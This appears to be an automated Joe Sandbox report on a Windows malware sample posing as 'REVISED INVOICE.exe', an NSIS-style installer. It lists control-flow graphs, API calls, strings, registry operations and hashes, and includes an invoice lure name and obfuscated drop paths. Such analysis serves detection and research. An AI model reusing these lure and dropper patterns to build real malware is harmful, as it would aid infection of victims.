                                                                                                • Opcode Fuzzy Hash: db80b2588597b3e26acc2e4c4de499a3f9846f615b8d16b47e4426e139c46013
                                                                                                • Instruction Fuzzy Hash: C861A670644200BAD220AF669D45F3B3A6CEB84749F80457FF941B22E2CB7C6D01CA7E

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 434 402dee-402e3c GetTickCount GetModuleFileNameW call 405bf4 437 402e48-402e76 call 40601f call 405a1f call 40601f GetFileSize 434->437 438 402e3e-402e43 434->438 446 402f63-402f71 call 402d8a 437->446 447 402e7c 437->447 439 403020-403024 438->439 454 402f73-402f76 446->454 455 402fc6-402fcb 446->455 448 402e81-402e98 447->448 450 402e9a 448->450 451 402e9c-402ea5 call 40320c 448->451 450->451 460 402eab-402eb2 451->460 461 402fcd-402fd5 call 402d8a 451->461 456 402f78-402f90 call 403222 call 40320c 454->456 457 402f9a-402fc4 GlobalAlloc call 403222 call 403027 454->457 455->439 456->455 480 402f92-402f98 456->480 457->455 485 402fd7-402fe8 457->485 464 402eb4-402ec8 call 405baf 460->464 465 402f2e-402f32 460->465 461->455 470 402f3c-402f42 464->470 483 402eca-402ed1 464->483 469 402f34-402f3b call 402d8a 465->469 465->470 469->470 476 402f51-402f5b 470->476 477 402f44-402f4e call 4064a6 470->477 476->448 484 402f61 476->484 477->476 480->455 480->457 483->470 489 402ed3-402eda 483->489 484->446 486 402ff0-402ff5 485->486 487 402fea 485->487 490 402ff6-402ffc 486->490 487->486 489->470 491 402edc-402ee3 489->491 490->490 492 402ffe-403019 SetFilePointer call 405baf 490->492 491->470 493 402ee5-402eec 491->493 496 40301e 492->496 493->470 495 402eee-402f0e 493->495 495->455 497 402f14-402f18 495->497 496->439 498 402f20-402f28 497->498 499 402f1a-402f1e 497->499 498->470 500 402f2a-402f2c 498->500 499->484 499->498 500->470
                                                                                                APIs
                                                                                                • GetTickCount.KERNEL32(7570D4C4,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\REVISED INVOICE.exe",?,?,00000000,00403504,?), ref: 00402DFF
                                                                                                • GetModuleFileNameW.KERNEL32(00000000,00437800,00000400,?,?,00000000,00403504,?), ref: 00402E1B
                                                                                                  • Part of subcall function 00405BF4: GetFileAttributesW.KERNELBASE(00000003,00402E2E,00437800,80000000,00000003,?,?,00000000,00403504,?), ref: 00405BF8
                                                                                                  • Part of subcall function 00405BF4: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405C1A
                                                                                                • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003,?,?,00000000,00403504,?), ref: 00402E67
                                                                                                Strings
                                                                                                • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00402FC6
                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00402DF5
                                                                                                • "C:\Users\user\Desktop\REVISED INVOICE.exe", xrefs: 00402DF4
                                                                                                • C:\Users\user\Desktop, xrefs: 00402E49, 00402E4E, 00402E54
                                                                                                • Null, xrefs: 00402EE5
                                                                                                • Inst, xrefs: 00402ED3
                                                                                                • Error launching installer, xrefs: 00402E3E
                                                                                                • soft, xrefs: 00402EDC
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                • String ID: "C:\Users\user\Desktop\REVISED INVOICE.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                • API String ID: 4283519449-253936284
                                                                                                • Opcode ID: 5c453212d903dc701faa49355209661bb92ff5e6ac37f0c8ac23110231670f15
                                                                                                • Instruction ID: cad0cac5a7d3da6b721da94722abfb33afad8597fd9771d3107dd1117b6c1d4f
                                                                                                • Opcode Fuzzy Hash: 5c453212d903dc701faa49355209661bb92ff5e6ac37f0c8ac23110231670f15
                                                                                                • Instruction Fuzzy Hash: EA51D471901216ABDB209F64DE89B9E7BB8EB04354F20407BF904F62D1C7BC9D419BAD

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 626 401767-40178c call 402bbf call 405a4a 631 401796-4017a8 call 40601f call 4059d3 lstrcatW 626->631 632 40178e-401794 call 40601f 626->632 637 4017ad-4017ae call 4062b3 631->637 632->637 641 4017b3-4017b7 637->641 642 4017b9-4017c3 call 406362 641->642 643 4017ea-4017ed 641->643 650 4017d5-4017e7 642->650 651 4017c5-4017d3 CompareFileTime 642->651 645 4017f5-401811 call 405bf4 643->645 646 4017ef-4017f0 call 405bcf 643->646 653 401813-401816 645->653 654 401885-4018ae call 40517e call 403027 645->654 646->645 650->643 651->650 656 401867-401871 call 40517e 653->656 657 401818-401856 call 40601f * 2 call 406041 call 40601f call 405764 653->657 667 4018b0-4018b4 654->667 668 4018b6-4018c2 SetFileTime 654->668 669 40187a-401880 656->669 657->641 688 40185c-40185d 657->688 667->668 671 4018c8-4018d3 CloseHandle 667->671 668->671 672 402a55 669->672 674 4018d9-4018dc 671->674 675 402a4c-402a4f 671->675 676 402a57-402a5b 672->676 678 4018f1-4018f4 call 406041 674->678 679 4018de-4018ef call 406041 lstrcatW 674->679 675->672 685 4018f9-40228d call 405764 678->685 679->685 685->675 685->676 688->669 691 40185f-401860 688->691 691->656
                                                                                                APIs
                                                                                                • lstrcatW.KERNEL32(00000000,00000000,%sortimentsboghandler%\Cacodemonia\Kimbladene,C:\Users\user\AppData\Local\fona\Kvit,?,?,00000031), ref: 004017A8
                                                                                                • CompareFileTime.KERNEL32(-00000014,?,%sortimentsboghandler%\Cacodemonia\Kimbladene,%sortimentsboghandler%\Cacodemonia\Kimbladene,00000000,00000000,%sortimentsboghandler%\Cacodemonia\Kimbladene,C:\Users\user\AppData\Local\fona\Kvit,?,?,00000031), ref: 004017CD
                                                                                                  • Part of subcall function 0040601F: lstrcpynW.KERNEL32(00409300,00409300,00000400,0040331A,00428220,NSIS Error), ref: 0040602C
                                                                                                  • Part of subcall function 0040517E: lstrlenW.KERNEL32(004216E8,00000000,0040FEC0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000,?), ref: 004051B6
                                                                                                  • Part of subcall function 0040517E: lstrlenW.KERNEL32(00403160,004216E8,00000000,0040FEC0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000), ref: 004051C6
                                                                                                  • Part of subcall function 0040517E: lstrcatW.KERNEL32(004216E8,00403160,00403160,004216E8,00000000,0040FEC0,00000000), ref: 004051D9
                                                                                                  • Part of subcall function 0040517E: SetWindowTextW.USER32(004216E8,004216E8,00000000,0040FEC0,00000000,?,?,?,?,?,?,?,?,?,00403160), ref: 004051EB
                                                                                                  • Part of subcall function 0040517E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405211
                                                                                                  • Part of subcall function 0040517E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040522B
                                                                                                  • Part of subcall function 0040517E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405239
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                • String ID: %sortimentsboghandler%\Cacodemonia\Kimbladene$C:\Users\user\AppData\Local\fona\Kvit$brandenes\opinionsdanner\Dagsudflugt$open C:\Users\user\Desktop\bhabar\biffins.Unr
                                                                                                • API String ID: 1941528284-1116174614
                                                                                                • Opcode ID: fa6c9ee85054582e6053dcadd9bdeda21757e8bc23449a0a696a8e9d1f30f139
                                                                                                • Instruction ID: e39dfb19bb2720adffc224853af95c022162de9bd11196ce21bc9617d3384428
                                                                                                • Opcode Fuzzy Hash: fa6c9ee85054582e6053dcadd9bdeda21757e8bc23449a0a696a8e9d1f30f139
                                                                                                • Instruction Fuzzy Hash: 9041D571900515BACF20BFB5CC45DAF3679EF45328B20427BF422B50E2DB3C8A519A6D

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 692 403027-40303e 693 403040 692->693 694 403047-40304f 692->694 693->694 695 403051 694->695 696 403056-40305b 694->696 695->696 697 40306b-403078 call 40320c 696->697 698 40305d-403066 call 403222 696->698 702 4031c3 697->702 703 40307e-403082 697->703 698->697 706 4031c5-4031c6 702->706 704 403088-4030a8 GetTickCount call 406514 703->704 705 4031ac-4031ae 703->705 716 403202 704->716 718 4030ae-4030b6 704->718 707 4031b0-4031b3 705->707 708 4031f7-4031fb 705->708 710 403205-403209 706->710 711 4031b5 707->711 712 4031b8-4031c1 call 40320c 707->712 713 4031c8-4031ce 708->713 714 4031fd 708->714 711->712 712->702 725 4031ff 712->725 719 4031d0 713->719 720 4031d3-4031e1 call 40320c 713->720 714->716 716->710 722 4030b8 718->722 723 4030bb-4030c9 call 40320c 718->723 719->720 720->702 729 4031e3-4031ef call 405ca6 720->729 722->723 723->702 730 4030cf-4030d8 723->730 725->716 734 4031f1-4031f4 729->734 735 4031a8-4031aa 729->735 732 4030de-4030fb call 406534 730->732 738 403101-403118 GetTickCount 732->738 739 4031a4-4031a6 732->739 734->708 735->706 740 403163-403165 738->740 741 40311a-403122 738->741 739->706 742 403167-40316b 740->742 743 403198-40319c 740->743 744 403124-403128 741->744 745 40312a-403160 MulDiv wsprintfW call 40517e 741->745 747 403180-403186 742->747 748 40316d-403172 call 405ca6 742->748 743->718 749 4031a2 743->749 744->740 744->745 745->740 752 40318c-403190 747->752 753 403177-403179 748->753 749->716 752->732 754 403196 752->754 753->735 755 40317b-40317e 753->755 754->716 755->752
                                                                                                APIs
                                                                                                • GetTickCount.KERNEL32(000000FF,00000004,00000000,00000000,00000000), ref: 00403088
                                                                                                • GetTickCount.KERNEL32(0040BEC0,00004000), ref: 00403109
                                                                                                • MulDiv.KERNEL32 ref: 00403136
                                                                                                • wsprintfW.USER32 ref: 00403149
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID: CountTick$wsprintf
                                                                                                • String ID: ... %d%%
                                                                                                • API String ID: 551687249-2449383134
                                                                                                • Opcode ID: cf664cf4806fb32f7aca161fbd37ecbefe006222c1d77f285591627fdb242337
                                                                                                • Instruction ID: dc339ecebd5a12fc0f5e273b782e0acc65c92b35cb5ec2ffb99f959b3dc2fe49
                                                                                                • Opcode Fuzzy Hash: cf664cf4806fb32f7aca161fbd37ecbefe006222c1d77f285591627fdb242337
                                                                                                • Instruction Fuzzy Hash: CC517A71900219ABDB10DF65D904B9F3FA8AF04766F14427BF911BB2C5C7789E408BE9

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 756 40237b-4023c1 call 402cb4 call 402bbf * 2 RegCreateKeyExW 763 4023c7-4023cf 756->763 764 402a4c-402a5b 756->764 765 4023d1-4023de call 402bbf lstrlenW 763->765 766 4023e2-4023e5 763->766 765->766 769 4023f5-4023f8 766->769 770 4023e7-4023f4 call 402ba2 766->770 774 402409-40241d RegSetValueExW 769->774 775 4023fa-402404 call 403027 769->775 770->769 778 402422-4024fc RegCloseKey 774->778 779 40241f 774->779 775->774 778->764 779->778
                                                                                                APIs
                                                                                                • RegCreateKeyExW.KERNEL32(00000000,00000000,?,?,?,?,?,?), ref: 004023B9
                                                                                                • lstrlenW.KERNEL32(brandenes\opinionsdanner\Dagsudflugt,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023D9
                                                                                                • RegSetValueExW.KERNEL32 ref: 00402415
                                                                                                • RegCloseKey.KERNEL32(?), ref: 004024F6
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseCreateValuelstrlen
                                                                                                • String ID: brandenes\opinionsdanner\Dagsudflugt
                                                                                                • API String ID: 1356686001-563703398
                                                                                                • Opcode ID: 66f48faa1bab367393d480de5df591319f7b291825b04af0d9622cff9ca73f92
                                                                                                • Instruction ID: 7111b63e716528206d7143fef0c5d48aa4ff5df43585b472b347a68cc626e816
                                                                                                • Opcode Fuzzy Hash: 66f48faa1bab367393d480de5df591319f7b291825b04af0d9622cff9ca73f92
                                                                                                • Instruction Fuzzy Hash: 5B11AE71E00108BFEB10EFA4DD89DAE76BCEB04358F10403AF904B21D1D6B85E419628

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 781 402bff-402c28 RegOpenKeyExW 782 402c93-402c97 781->782 783 402c2a-402c35 781->783 784 402c50-402c60 RegEnumKeyW 783->784 785 402c62-402c74 RegCloseKey call 4063f5 784->785 786 402c37-402c3a 784->786 794 402c76-402c85 785->794 795 402c9a-402ca0 785->795 787 402c87-402c8a RegCloseKey 786->787 788 402c3c-402c4e call 402bff 786->788 792 402c90-402c92 787->792 788->784 788->785 792->782 794->782 795->792 796 402ca2-402cb0 RegDeleteKeyW 795->796 796->792 797 402cb2 796->797 797->782
                                                                                                APIs
                                                                                                • RegOpenKeyExW.KERNEL32 ref: 00402C20
                                                                                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402C5C
                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00402C65
                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00402C8A
                                                                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402CA8
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID: Close$DeleteEnumOpen
                                                                                                • String ID:
                                                                                                • API String ID: 1912718029-0
                                                                                                • Opcode ID: 2793c90fd49a5e1b605453f73a61c738209944c63e67e711cf318bb8db1452b8
                                                                                                • Instruction ID: 783455ef39ba97bad4d92773a6bd33e03ba47aaf13af7a3f43d32fd345691cd1
                                                                                                • Opcode Fuzzy Hash: 2793c90fd49a5e1b605453f73a61c738209944c63e67e711cf318bb8db1452b8
                                                                                                • Instruction Fuzzy Hash: 52115971908118FEEF119F90DE8CEAE3B79FB14384F100476FA05A10A0D3B49E52AA69

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 799 401bdf-401bf7 call 402ba2 * 2 804 401c03-401c07 799->804 805 401bf9-401c00 call 402bbf 799->805 807 401c13-401c19 804->807 808 401c09-401c10 call 402bbf 804->808 805->804 811 401c1b-401c2f call 402ba2 * 2 807->811 812 401c5f-401c89 call 402bbf * 2 FindWindowExW 807->812 808->807 822 401c31-401c4d SendMessageTimeoutW 811->822 823 401c4f-401c5d SendMessageW 811->823 824 401c8f 812->824 825 401c92-401c95 822->825 823->824 824->825 826 401c9b 825->826 827 402a4c-402a5b 825->827 826->827
                                                                                                APIs
                                                                                                • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C3F
                                                                                                • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C57
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$Timeout
                                                                                                • String ID: !
                                                                                                • API String ID: 1777923405-2657877971
                                                                                                • Opcode ID: 89185f19cab5c9d2123c9567e553a40f312bc8837cbfc1fecf3123f783c5ad12
                                                                                                • Instruction ID: a67f43666b390050b7c93cc16dc22df3288c4645dfbd1c9967af83c22614668d
                                                                                                • Opcode Fuzzy Hash: 89185f19cab5c9d2123c9567e553a40f312bc8837cbfc1fecf3123f783c5ad12
                                                                                                • Instruction Fuzzy Hash: 7C21B071944209BEEF01AFB0CE4AABE7B75EB40304F10403EF601B61D1D6B89A409B69

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 830 405eec-405f1e RegOpenKeyExW 831 405f60-405f63 830->831 832 405f20-405f3f RegQueryValueExW 830->832 833 405f41-405f45 832->833 834 405f4d 832->834 835 405f50-405f5a RegCloseKey 833->835 836 405f47-405f4b 833->836 834->835 835->831 836->834 836->835
                                                                                                APIs
                                                                                                • RegOpenKeyExW.KERNEL32 ref: 00405F16
                                                                                                • RegQueryValueExW.KERNEL32(?,?,00000000,?,?,?), ref: 00405F37
                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00405F5A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseOpenQueryValue
                                                                                                • String ID: antireform
                                                                                                • API String ID: 3677997916-466533878
                                                                                                • Opcode ID: c3918b15ec2dd140c4f3d1bafefc28aadc87a0cff0ebfff7b8d124f540ee4f6a
                                                                                                • Instruction ID: c601889377c76b9115debbe7433e53646a10130b96f6f591fa827391142cde11
                                                                                                • Opcode Fuzzy Hash: c3918b15ec2dd140c4f3d1bafefc28aadc87a0cff0ebfff7b8d124f540ee4f6a
                                                                                                • Instruction Fuzzy Hash: 26010C3255020AEADB218F65ED09E9B3BACEF44350B004026F919D6260D735D964DFA5

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 837 405c23-405c2f 838 405c30-405c64 GetTickCount GetTempFileNameW 837->838 839 405c73-405c75 838->839 840 405c66-405c68 838->840 842 405c6d-405c70 839->842 840->838 841 405c6a 840->841 841->842
                                                                                                APIs
                                                                                                • GetTickCount.KERNEL32(7570D4C4,C:\Users\user\AppData\Local\Temp\,?,?,00000000,00403268,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403496), ref: 00405C41
                                                                                                • GetTempFileNameW.KERNELBASE(00409300,?,00000000,?,?,?,00000000,00403268,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403496), ref: 00405C5C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID: CountFileNameTempTick
                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                • API String ID: 1716503409-4262883142
                                                                                                • Opcode ID: f059ee56c8deccd03f6e154050eb187f2ccb3477461fa331799173a8e43ad9ef
                                                                                                • Instruction ID: 4fdac09ee551a982241d11f866b864b283b1b610f450d112551ccb25b2c02e5c
                                                                                                • Opcode Fuzzy Hash: f059ee56c8deccd03f6e154050eb187f2ccb3477461fa331799173a8e43ad9ef
                                                                                                • Instruction Fuzzy Hash: 0EF03676B04208BFEB108F55DD49E9BB7ADEB95750F10403AF901F7150E6B0AE548758

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 843 406389-4063a9 GetSystemDirectoryW 844 4063ab 843->844 845 4063ad-4063af 843->845 844->845 846 4063c0-4063c2 845->846 847 4063b1-4063ba 845->847 849 4063c3-4063f2 wsprintfW LoadLibraryW 846->849 847->846 848 4063bc-4063be 847->848 848->849
                                                                                                APIs
                                                                                                • GetSystemDirectoryW.KERNEL32(?,00000104,00000020), ref: 004063A0
                                                                                                • wsprintfW.USER32 ref: 004063DB
                                                                                                • LoadLibraryW.KERNEL32(?), ref: 004063EB
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
